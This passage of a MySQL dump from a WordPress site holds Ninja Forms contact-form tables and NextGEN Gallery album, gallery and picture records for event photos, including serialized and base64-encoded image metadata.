styles_margin',''),(247,4,'submit_element_hover_styles_padding',''),(248,4,'submit_element_hover_styles_display',''),(249,4,'submit_element_hover_styles_float',''),(250,4,'submit_element_hover_styles_show_advanced_css','0'),(251,4,'submit_element_hover_styles_advanced',''),(252,4,'cellcid','c3287');
/*!40000 ALTER TABLE `lwz_nf3_field_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_fields`
--

DROP TABLE IF EXISTS `lwz_nf3_fields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_fields` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `label` longtext,
  `key` longtext,
  `type` longtext,
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_fields`
--

LOCK TABLES `lwz_nf3_fields` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_fields` DISABLE KEYS */;
INSERT INTO `lwz_nf3_fields` VALUES (1,'Name','name','textbox',1,'2017-09-13 13:05:27','2017-09-13 07:05:27'),(2,'Email','email','email',1,'2017-09-13 13:05:27','2017-09-13 07:05:27'),(3,'Message','message','textarea',1,'2017-09-13 13:05:27','2017-09-13 07:05:27'),(4,'Submit','submit','submit',1,'2017-09-13 13:05:27','2017-09-13 07:05:27');
/*!40000 ALTER TABLE `lwz_nf3_fields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_form_meta`
--

DROP TABLE IF EXISTS `lwz_nf3_form_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_form_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext,
  `meta_key` longtext CHARACTER SET utf8mb4,
  `meta_value` longtext CHARACTER SET utf8mb4,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=193 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_form_meta`
--

LOCK TABLES `lwz_nf3_form_meta` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_form_meta` DISABLE KEYS */;
INSERT INTO `lwz_nf3_form_meta` VALUES (1,1,'default_label_pos','above',NULL,NULL),(2,1,'conditions','a:0:{}',NULL,NULL),(3,1,'objectType','Form Setting',NULL,NULL),(4,1,'editActive','',NULL,NULL),(5,1,'show_title','1',NULL,NULL),(6,1,'clear_complete','1',NULL,NULL),(7,1,'hide_complete','1',NULL,NULL),(8,1,'wrapper_class','',NULL,NULL),(9,1,'element_class','',NULL,NULL),(10,1,'add_submit','1',NULL,NULL),(11,1,'logged_in','',NULL,NULL),(12,1,'not_logged_in_msg','',NULL,NULL),(13,1,'sub_limit_number','',NULL,NULL),(14,1,'sub_limit_msg','',NULL,NULL),(15,1,'calculations','a:0:{}',NULL,NULL),(16,1,'formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}',NULL,NULL),(17,1,'container_styles_background-color','',NULL,NULL),(18,1,'container_styles_border','',NULL,NULL),(19,1,'container_styles_border-style','',NULL,NULL),(20,1,'container_styles_border-color','',NULL,NULL),(21,1,'container_styles_color','',NULL,NULL),(22,1,'container_styles_height','',NULL,NULL),(23,1,'container_styles_width','',NULL,NULL),(24,1,'container_styles_font-size','',NULL,NULL),(25,1,'container_styles_margin','',NULL,NULL),(26,1,'container_styles_padding','',NULL,NULL),(27,1,'container_styles_display','',NULL,NULL),(28,1,'container_styles_float','',NULL,NULL),(29,1,'container_styles_show_advanced_css','0',NULL,NULL),(30,1,'container_styles_advanced','',NULL,NULL),(31,1,'title_styles_background-color','',NULL,NULL),(32,1,'title_styles_border','',NULL,NULL),(33,1,'title_styles_border-style','',NULL,NULL),(34,1,'title_styles_border-color','',NULL,NULL),(35,1,'title_styles_color','',NULL,NULL),(36,1,'title_styles_height','',NULL,NULL),(37,1,'title_styles_width','',NULL,NULL),(38,1,'title_styles_font-size','',NULL,NULL),(39,1,'title_styles_margin','',NULL,NULL),(40,1,'title_styles_padding','',NULL,NULL),(41,1,'title_styles_display','',NULL,NULL),(42,1,'title_styles_float','',NULL,NULL),(43,1,'title_styles_show_advanced_css','0',NULL,NULL),(44,1,'title_styles_advanced','',NULL,NULL),(45,1,'row_styles_background-color','',NULL,NULL),(46,1,'row_styles_border','',NULL,NULL),(47,1,'row_styles_border-style','',NULL,NULL),(48,1,'row_styles_border-color','',NULL,NULL),(49,1,'row_styles_color','',NULL,NULL),(50,1,'row_styles_height','',NULL,NULL),(51,1,'row_styles_width','',NULL,NULL),(52,1,'row_styles_font-size','',NULL,NULL),(53,1,'row_styles_margin','',NULL,NULL),(54,1,'row_styles_padding','',NULL,NULL),(55,1,'row_styles_display','',NULL,NULL),(56,1,'row_styles_show_advanced_css','0',NULL,NULL),(57,1,'row_styles_advanced','',NULL,NULL),(58,1,'row-odd_styles_background-color','',NULL,NULL),(59,1,'row-odd_styles_border','',NULL,NULL),(60,1,'row-odd_styles_border-style','',NULL,NULL),(61,1,'row-odd_styles_border-color','',NULL,NULL),(62,1,'row-odd_styles_color','',NULL,NULL),(63,1,'row-odd_styles_height','',NULL,NULL),(64,1,'row-odd_styles_width','',NULL,NULL),(65,1,'row-odd_styles_font-size','',NULL,NULL),(66,1,'row-odd_styles_margin','',NULL,NULL),(67,1,'row-odd_styles_padding','',NULL,NULL),(68,1,'row-odd_styles_display','',NULL,NULL),(69,1,'row-odd_styles_show_advanced_css','0',NULL,NULL),(70,1,'row-odd_styles_advanced','',NULL,NULL),(71,1,'success-msg_styles_background-color','',NULL,NULL),(72,1,'success-msg_styles_border','',NULL,NULL),(73,1,'success-msg_styles_border-style','',NULL,NULL),(74,1,'success-msg_styles_border-color','',NULL,NULL),(75,1,'success-msg_styles_color','',NULL,NULL),(76,1,'success-msg_styles_height','',NULL,NULL),(77,1,'success-msg_styles_width','',NULL,NULL),(78,1,'success-msg_styles_font-size','',NULL,NULL),(79,1,'success-msg_styles_margin','',NULL,NULL),(80,1,'success-msg_styles_padding','',NULL,NULL),(81,1,'success-msg_styles_display','',NULL,NULL),(82,1,'success-msg_styles_show_advanced_css','0',NULL,NULL),(83,1,'success-msg_styles_advanced','',NULL,NULL),(84,1,'error_msg_styles_background-color','',NULL,NULL),(85,1,'error_msg_styles_border','',NULL,NULL),(86,1,'error_msg_styles_border-style','',NULL,NULL),(87,1,'error_msg_styles_border-color','',NULL,NULL),(88,1,'error_msg_styles_color','',NULL,NULL),(89,1,'error_msg_styles_height','',NULL,NULL),(90,1,'error_msg_styles_width','',NULL,NULL),(91,1,'error_msg_styles_font-size','',NULL,NULL),(92,1,'error_msg_styles_margin','',NULL,NULL),(93,1,'error_msg_styles_padding','',NULL,NULL),(94,1,'error_msg_styles_display','',NULL,NULL),(95,1,'error_msg_styles_show_advanced_css','0',NULL,NULL),(96,1,'error_msg_styles_advanced','',NULL,NULL),(97,2,'default_label_pos','above',NULL,NULL),(98,2,'conditions','a:0:{}',NULL,NULL),(99,2,'objectType','Form Setting',NULL,NULL),(100,2,'editActive','',NULL,NULL),(101,2,'show_title','1',NULL,NULL),(102,2,'clear_complete','1',NULL,NULL),(103,2,'hide_complete','1',NULL,NULL),(104,2,'wrapper_class','',NULL,NULL),(105,2,'element_class','',NULL,NULL),(106,2,'add_submit','1',NULL,NULL),(107,2,'logged_in','',NULL,NULL),(108,2,'not_logged_in_msg','',NULL,NULL),(109,2,'sub_limit_number','',NULL,NULL),(110,2,'sub_limit_msg','',NULL,NULL),(111,2,'calculations','a:0:{}',NULL,NULL),(112,2,'formContentData','a:4:{i:0;a:2:{s:5:\"order\";s:1:\"0\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:4:\"name\";}s:5:\"width\";s:3:\"100\";}}}i:1;a:2:{s:5:\"order\";s:1:\"1\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:5:\"email\";}s:5:\"width\";s:3:\"100\";}}}i:2;a:2:{s:5:\"order\";s:1:\"2\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:7:\"message\";}s:5:\"width\";s:3:\"100\";}}}i:3;a:2:{s:5:\"order\";s:1:\"3\";s:5:\"cells\";a:1:{i:0;a:3:{s:5:\"order\";s:1:\"0\";s:6:\"fields\";a:1:{i:0;s:6:\"submit\";}s:5:\"width\";s:3:\"100\";}}}}',NULL,NULL),(113,2,'container_styles_background-color','',NULL,NULL),(114,2,'container_styles_border','',NULL,NULL),(115,2,'container_styles_border-style','',NULL,NULL),(116,2,'container_styles_border-color','',NULL,NULL),(117,2,'container_styles_color','',NULL,NULL),(118,2,'container_styles_height','',NULL,NULL),(119,2,'container_styles_width','',NULL,NULL),(120,2,'container_styles_font-size','',NULL,NULL),(121,2,'container_styles_margin','',NULL,NULL),(122,2,'container_styles_padding','',NULL,NULL),(123,2,'container_styles_display','',NULL,NULL),(124,2,'container_styles_float','',NULL,NULL),(125,2,'container_styles_show_advanced_css','0',NULL,NULL),(126,2,'container_styles_advanced','',NULL,NULL),(127,2,'title_styles_background-color','',NULL,NULL),(128,2,'title_styles_border','',NULL,NULL),(129,2,'title_styles_border-style','',NULL,NULL),(130,2,'title_styles_border-color','',NULL,NULL),(131,2,'title_styles_color','',NULL,NULL),(132,2,'title_styles_height','',NULL,NULL),(133,2,'title_styles_width','',NULL,NULL),(134,2,'title_styles_font-size','',NULL,NULL),(135,2,'title_styles_margin','',NULL,NULL),(136,2,'title_styles_padding','',NULL,NULL),(137,2,'title_styles_display','',NULL,NULL),(138,2,'title_styles_float','',NULL,NULL),(139,2,'title_styles_show_advanced_css','0',NULL,NULL),(140,2,'title_styles_advanced','',NULL,NULL),(141,2,'row_styles_background-color','',NULL,NULL),(142,2,'row_styles_border','',NULL,NULL),(143,2,'row_styles_border-style','',NULL,NULL),(144,2,'row_styles_border-color','',NULL,NULL),(145,2,'row_styles_color','',NULL,NULL),(146,2,'row_styles_height','',NULL,NULL),(147,2,'row_styles_width','',NULL,NULL),(148,2,'row_styles_font-size','',NULL,NULL),(149,2,'row_styles_margin','',NULL,NULL),(150,2,'row_styles_padding','',NULL,NULL),(151,2,'row_styles_display','',NULL,NULL),(152,2,'row_styles_show_advanced_css','0',NULL,NULL),(153,2,'row_styles_advanced','',NULL,NULL),(154,2,'row-odd_styles_background-color','',NULL,NULL),(155,2,'row-odd_styles_border','',NULL,NULL),(156,2,'row-odd_styles_border-style','',NULL,NULL),(157,2,'row-odd_styles_border-color','',NULL,NULL),(158,2,'row-odd_styles_color','',NULL,NULL),(159,2,'row-odd_styles_height','',NULL,NULL),(160,2,'row-odd_styles_width','',NULL,NULL),(161,2,'row-odd_styles_font-size','',NULL,NULL),(162,2,'row-odd_styles_margin','',NULL,NULL),(163,2,'row-odd_styles_padding','',NULL,NULL),(164,2,'row-odd_styles_display','',NULL,NULL),(165,2,'row-odd_styles_show_advanced_css','0',NULL,NULL),(166,2,'row-odd_styles_advanced','',NULL,NULL),(167,2,'success-msg_styles_background-color','',NULL,NULL),(168,2,'success-msg_styles_border','',NULL,NULL),(169,2,'success-msg_styles_border-style','',NULL,NULL),(170,2,'success-msg_styles_border-color','',NULL,NULL),(171,2,'success-msg_styles_color','',NULL,NULL),(172,2,'success-msg_styles_height','',NULL,NULL),(173,2,'success-msg_styles_width','',NULL,NULL),(174,2,'success-msg_styles_font-size','',NULL,NULL),(175,2,'success-msg_styles_margin','',NULL,NULL),(176,2,'success-msg_styles_padding','',NULL,NULL),(177,2,'success-msg_styles_display','',NULL,NULL),(178,2,'success-msg_styles_show_advanced_css','0',NULL,NULL),(179,2,'success-msg_styles_advanced','',NULL,NULL),(180,2,'error_msg_styles_background-color','',NULL,NULL),(181,2,'error_msg_styles_border','',NULL,NULL),(182,2,'error_msg_styles_border-style','',NULL,NULL),(183,2,'error_msg_styles_border-color','',NULL,NULL),(184,2,'error_msg_styles_color','',NULL,NULL),(185,2,'error_msg_styles_height','',NULL,NULL),(186,2,'error_msg_styles_width','',NULL,NULL),(187,2,'error_msg_styles_font-size','',NULL,NULL),(188,2,'error_msg_styles_margin','',NULL,NULL),(189,2,'error_msg_styles_padding','',NULL,NULL),(190,2,'error_msg_styles_display','',NULL,NULL),(191,2,'error_msg_styles_show_advanced_css','0',NULL,NULL),(192,2,'error_msg_styles_advanced','',NULL,NULL);
/*!40000 ALTER TABLE `lwz_nf3_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_forms`
--

DROP TABLE IF EXISTS `lwz_nf3_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext,
  `key` longtext,
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `updated_at` datetime DEFAULT NULL,
  `views` int(11) DEFAULT NULL,
  `subs` int(11) DEFAULT NULL,
  `form_title` longtext CHARACTER SET utf8mb4,
  `default_label_pos` varchar(15) CHARACTER SET utf8mb4 DEFAULT NULL,
  `show_title` bit(1) DEFAULT NULL,
  `clear_complete` bit(1) DEFAULT NULL,
  `hide_complete` bit(1) DEFAULT NULL,
  `logged_in` bit(1) DEFAULT NULL,
  `seq_num` int(11) DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_forms`
--

LOCK TABLES `lwz_nf3_forms` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_forms` DISABLE KEYS */;
INSERT INTO `lwz_nf3_forms` VALUES (1,'Contact Me','','2017-09-13 13:05:26','2017-09-13 07:05:26',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL),(2,'Contact Me','','2017-09-13 13:17:57','2017-09-13 07:17:57',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL);
/*!40000 ALTER TABLE `lwz_nf3_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_object_meta`
--

DROP TABLE IF EXISTS `lwz_nf3_object_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_object_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_object_meta`
--

LOCK TABLES `lwz_nf3_object_meta` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_object_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_nf3_object_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_objects`
--

DROP TABLE IF EXISTS `lwz_nf3_objects`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_objects` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `type` longtext,
  `title` longtext,
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_objects`
--

LOCK TABLES `lwz_nf3_objects` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_objects` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_nf3_objects` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_relationships`
--

DROP TABLE IF EXISTS `lwz_nf3_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_relationships` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `child_id` int(11) NOT NULL,
  `child_type` longtext NOT NULL,
  `parent_id` int(11) NOT NULL,
  `parent_type` longtext NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `updated_at` datetime DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_relationships`
--

LOCK TABLES `lwz_nf3_relationships` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_relationships` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_nf3_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_nf3_upgrades`
--

DROP TABLE IF EXISTS `lwz_nf3_upgrades`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_nf3_upgrades` (
  `id` int(11) NOT NULL,
  `cache` longtext,
  `stage` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_nf3_upgrades`
--

LOCK TABLES `lwz_nf3_upgrades` WRITE;
/*!40000 ALTER TABLE `lwz_nf3_upgrades` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_nf3_upgrades` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_ngg_album`
--

DROP TABLE IF EXISTS `lwz_ngg_album`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_ngg_album` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `previewpic` bigint(20) NOT NULL DEFAULT '0',
  `albumdesc` mediumtext,
  `sortorder` longtext NOT NULL,
  `pageid` bigint(20) NOT NULL DEFAULT '0',
  `extras_post_id` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `extras_post_id_key` (`extras_post_id`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_ngg_album`
--

LOCK TABLES `lwz_ngg_album` WRITE;
/*!40000 ALTER TABLE `lwz_ngg_album` DISABLE KEYS */;
INSERT INTO `lwz_ngg_album` VALUES (1,'2009 Adopt A Road','2009-adopt-a-road',1,'','WyIxIl0=',0,294),(3,'2009 Luggage Drive','2009-luggage-drive',4,'','WyIyIl0=',0,296),(4,'2009 March of Dimes','2009-march-of-dimes',10,'','WyIzIl0=',0,298),(5,'2009 Pan Hel','2009-pan-hel',14,'','WyI0Il0=',0,300),(6,'LGZ 25th Anniversary','lgz-25th-anniversary',16,'','WyI1Il0=',0,302),(8,'2014 Education Forum','test',0,'','WyIxMCJd',0,340),(9,'LGZ Spring 2015 Intake','lgz-spring-2015-intake',79,'','W10=',0,506);
/*!40000 ALTER TABLE `lwz_ngg_album` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_ngg_gallery`
--

DROP TABLE IF EXISTS `lwz_ngg_gallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_ngg_gallery` (
  `gid` bigint(20) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,
  `path` mediumtext,
  `title` mediumtext,
  `galdesc` mediumtext,
  `pageid` bigint(20) NOT NULL DEFAULT '0',
  `previewpic` bigint(20) NOT NULL DEFAULT '0',
  `author` bigint(20) NOT NULL DEFAULT '0',
  `extras_post_id` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`gid`),
  KEY `extras_post_id_key` (`extras_post_id`)
) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_ngg_gallery`
--

LOCK TABLES `lwz_ngg_gallery` WRITE;
/*!40000 ALTER TABLE `lwz_ngg_gallery` DISABLE KEYS */;
INSERT INTO `lwz_ngg_gallery` VALUES (1,'2009-adopt-a-road','2009-adopt-a-road','wp-content/gallery/2009-adopt-a-road','2009 Adopt A Road','',0,1,1,0),(2,'2009-luggage-drive','2009-luggage-drive','wp-content/gallery/2009-luggage-drive','2009 Luggage Drive','',0,4,1,0),(3,'2009-march-of-dimes','2009-march-of-dimes','wp-content/gallery/2009-march-of-dimes','2009 March of Dimes','',0,10,1,0),(4,'2009-pan-hel','2009-pan-hel','wp-content/gallery/2009-pan-hel','2009 Pan Hel','',0,14,1,0),(5,'lgz-25th-anniversary','lgz-25th-anniversary','wp-content/gallery/lgz-25th-anniversary','LGZ 25th Anniversary','',0,16,1,0),(10,'test','test','/wp-content/gallery/test','2014 Education Forum','',0,59,3,394),(11,'lgz-spring-2015-intake','lgz-spring-2015-intake','wp-content/gallery/lgz-spring-2015-intake','LGZ Spring 2015 Intake ','',0,75,17,509);
/*!40000 ALTER TABLE `lwz_ngg_gallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_ngg_pictures`
--

DROP TABLE IF EXISTS `lwz_ngg_pictures`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_ngg_pictures` (
  `pid` bigint(20) NOT NULL AUTO_INCREMENT,
  `image_slug` varchar(255) NOT NULL,
  `post_id` bigint(20) NOT NULL DEFAULT '0',
  `galleryid` bigint(20) NOT NULL DEFAULT '0',
  `filename` varchar(255) NOT NULL,
  `description` mediumtext,
  `alttext` mediumtext,
  `imagedate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `exclude` tinyint(4) DEFAULT '0',
  `sortorder` bigint(20) NOT NULL DEFAULT '0',
  `meta_data` longtext,
  `extras_post_id` bigint(20) NOT NULL DEFAULT '0',
  `updated_at` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`pid`),
  KEY `post_id` (`post_id`),
  KEY `extras_post_id_key` (`extras_post_id`)
) ENGINE=MyISAM AUTO_INCREMENT=80 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_ngg_pictures`
--

LOCK TABLES `lwz_ngg_pictures` WRITE;
/*!40000 ALTER TABLE `lwz_ngg_pictures` DISABLE KEYS */;
INSERT INTO `lwz_ngg_pictures` VALUES (1,'adopt-a-road',0,1,'adopt-a-road.jpg','','adopt-a-road','2008-12-31 15:03:00',0,0,'eyJ3aWR0aCI6MTYzMiwiaGVpZ2h0IjoxMjI0LCJmdWxsIjp7IndpZHRoIjoxNjMyLCJoZWlnaHQiOjEyMjR9LCJ0aHVtYm5haWwiOnsid2lkdGgiOjEyMCwiaGVpZ2h0Ijo5MCwiZmlsZW5hbWUiOiJ0aHVtYnNfYWRvcHQtYS1yb2FkLmpwZyIsImdlbmVyYXRlZCI6IjAuOTQxODU0MDAgMTM4MDgzMjYwMSJ9LCJhcGVydHVyZSI6IkYgNCIsImNyZWRpdCI6ZmFsc2UsImNhbWVyYSI6IkRTQy1XNTAiLCJjYXB0aW9uIjpmYWxzZSwiY3JlYXRlZF90aW1lc3RhbXAiOiJEZWNlbWJlciAzMSwgMjAwOCAzOjAzIHBtIiwiY29weXJpZ2h0IjpmYWxzZSwiZm9jYWxfbGVuZ3RoIjoiMTAuOSBtbSIsImlzbyI6ODAsInNodXR0ZXJfc3BlZWQiOiIxXC8yMDAgc2VjIiwiZmxhc2giOiJOb3QgZmlyZWQiLCJ0aXRsZSI6IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiLCJrZXl3b3JkcyI6ZmFsc2UsInNhdmVkIjp0cnVlLCJuZ2cwZHluLTIwMHgyMDB4OTAtMDBmMHcwMTBjMDEwcjExMGYxMTByMDEwdDAzanBnIjp7IndpZHRoIjoyMDAsImhlaWdodCI6MTUwLCJmaWxlbmFtZSI6ImFkb3B0LWEtcm9hZC5qcGctbmdnaWQwMTEtbmdnMGR5bi0yMDB4MjAweDkwLTAwZjB3MDEwYzAxMHIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjM2NjY2ODAwIDE0NTY0NjM1NDMifSwibmdnMGR5bi0weDI1MC0wMGYwdzAxMWMwMTByMTEwZjExMHIwMTB0MDEwIjp7IndpZHRoIjozMzMsImhlaWdodCI6MjUwLCJmaWxlbmFtZSI6ImFkb3B0LWEtcm9hZC5qcGctbmdnaWQwMTEtbmdnMGR5bi0weDI1MC0wMGYwdzAxMWMwMTByMTEwZjExMHIwMTB0MDEwLmpwZyIsImdlbmVyYXRlZCI6IjAuNDg2ODE1MDAgMTQzMTYwNzczMiJ9LCJuZ2cwZHluLTkxeDY4LTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwMTAiOnsid2lkdGgiOjkxLCJoZWlnaHQiOjY4LCJmaWxlbmFtZSI6ImFkb3B0LWEtcm9hZC5qcGctbmdnaWQwMTEtbmdnMGR5bi05MXg2OC0wMGYwdzAxMGMwMTFyMTEwZjExMHIwMTB0MDEwLmpwZyIsImdlbmVyYXRlZCI6IjAuMzg4ODQ2MDAgMTQyNDY4MTE4NSJ9LCJuZ2cwZHluLTMwMHgyMDB4OTAtMDBmMHcwMTBjMDExcjExMGYxMTByMDEwdDAzanBnIjp7IndpZHRoIjozMDAsImhlaWdodCI6MjAwLCJmaWxlbmFtZSI6ImFkb3B0LWEtcm9hZC5qcGctbmdnaWQwMTEtbmdnMGR5bi0zMDB4MjAweDkwLTAwZjB3MDEwYzAxMXIxMTBmMTEwcjAxMHQwM2pwZy5qcGciLCJnZW5lcmF0ZWQiOiIwLjYzMTc1MTAwIDE0ODI3MTE5MDAifX0=',238,1482711900),(2,'dsc01338',0,1,'dsc01338.jpg',' ','dsc01338','2009-05-23 07:49:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc01338.jpg\";s:9:\"generated\";s:21:\"0.79146600 1380832613\";}s:8:\"aperture\";s:5:\"F 3.2\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:20:\"May 23, 2009 7:49 am\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:6:\"7.2 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:9:\"1/160 sec\";s:5:\"flash\";s:9:\"Not fired\";s:5:\"title\";s:31:\"                               \";s:8:\"keywords\";b:0;s:5:\"saved\";b:1;}',0,NULL),(3,'dsc01342',0,1,'dsc01342.jpg',' ','dsc01342','2009-05-23 08:04:00',0,0,'a:17:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"full\";a:2:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;}s:9:\"thumbnail\";a:4:{s:5:\"width\";i:120;s:6:\"height\";i:90;s:8:\"filename\";s:19:\"thumbs_dsc01342.jpg\";s:9:\"generated\";s:21:\"0.15571300 1380832623\";}s:8:\"aperture\";s:3:\"F 9\";s:6:\"credit\";b:0;s:6:\"camera\";s:7:\"DSC-W50\";s:7:\"caption\";b:0;s:17:\"created_timestamp\";s:20:\"May 23, 2009 8:04 am\";s:9:\"copyright\";b:0;s:12:\"focal_length\";s:7:\"10.9 mm\";s:3:\"iso\";i:80;s:13:\"shutter_speed\";s:9:\"1/130 sec\";s:5:\"flash\";s:9:\"Not 